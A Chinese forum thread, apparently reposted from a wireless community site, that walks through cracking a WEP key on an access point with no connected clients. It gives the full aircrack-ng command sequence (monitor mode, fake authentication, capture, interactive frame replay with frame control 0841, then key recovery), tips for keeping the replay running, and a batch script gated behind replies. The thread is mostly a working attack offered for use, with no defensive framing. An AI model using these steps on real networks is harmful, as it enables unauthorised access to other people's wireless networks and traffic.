完全无客户端 wep 破解方法

jiuweiljp

试验环境

ap：d-link 724 （没有任何有线和无线连接）

os：windows

网卡：atheros 驱动版本为commview 4.2.2.104

下面的操作在windows下linux下原理相同

第一步 （打开监视模式）

airserv-ng -c 1 -d "commview.dll|debug"

-c 1 (监视通道1)

第二步 （使用 fake authentication 攻击方式）

aireplay-ng -1 0 -e <ap essid> -a <ap bssid> -h <网卡mac> 127.0.0.1:666

第三步 （捕捉包）

airodump-ng -c 1 -w cap 127.0.0.1:666

第四步 （使用 interactive frame selection）这一步是关键

aireplayer-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h <网卡mac> -b <ap bssid> 127.0.0.1:666

解释 -p 0841 即将frame control 设置为 0841

运行这个命令后屏幕显示读包我测试的时候一般要读1-3万个包多个包（这个过程较长）

读到了一定数量后就会有下面的画面显示

一定要放弃第一个包（我测试的时候基本上放弃3个包以上）不然这个进程会死掉无法继续了
注意这张解图 BSSID = 00:0F:3D:32:BD:5D（ap mac） 并且 Source MAC = 00:0F:3D:32:BD:5D（ap mac）

测试几次都是一样的！！

然后开始发包了

可以看到 airodump-ng窗口的数据在增长

最后使用aircrack-ng破解了

aircrack-ng cap-01.cap

－－－－－－－－－－－－－－－－－－－－－－

后记：这篇文章写得较为粗糙可能有些网友看不太明白较为基础的可以参看我的

http://www.anywlan.com/dispbbs.asp?BoardID=15&ID=7225&replyID=&skin=1

有时间我会将该片文章的windows批处理文件写好的！

故乡-清风

回复看下文

jiuweiljp

我在airdump-ng的窗口中注意了一下这个D-LINK AP 在没有任何客户端的情况下也不是完全没有数据（DATA）

只是很少而已大约半小时就10来个，并且这些数据从原地址和目标地址上来判断好像是自己发给自己的。

如果你的ap完全没有数据我想这种方法也没有效果！！

批处理文件改好了需要的自行下载，解开后使用。

使用方法 air0841 <通道号> <ap essid> <ap bssid>

游客，如果您要查看本帖隐藏内容请回复

jiuweiljp

批处理文件修改完毕，需要者回复后可下载

使用方法 air0841< 通道号> <ap essid> <ap bssid>

希望大家共同讨论

superconductor

呵呵，那就老老实实的回复一次吧！

jun4609_cn

回复一次吧！

yijing502

回复看下文。[em02]

diggerxymvista

回复一次吧！
转自中国无线门户,原文地址：http://www.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1

一夜之间

回复可见

buger

回复可见
转自中国无线门户,原文地址：http://www.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1

kimiori

多谢提供支持

zzzhanghc

kankanknaknakn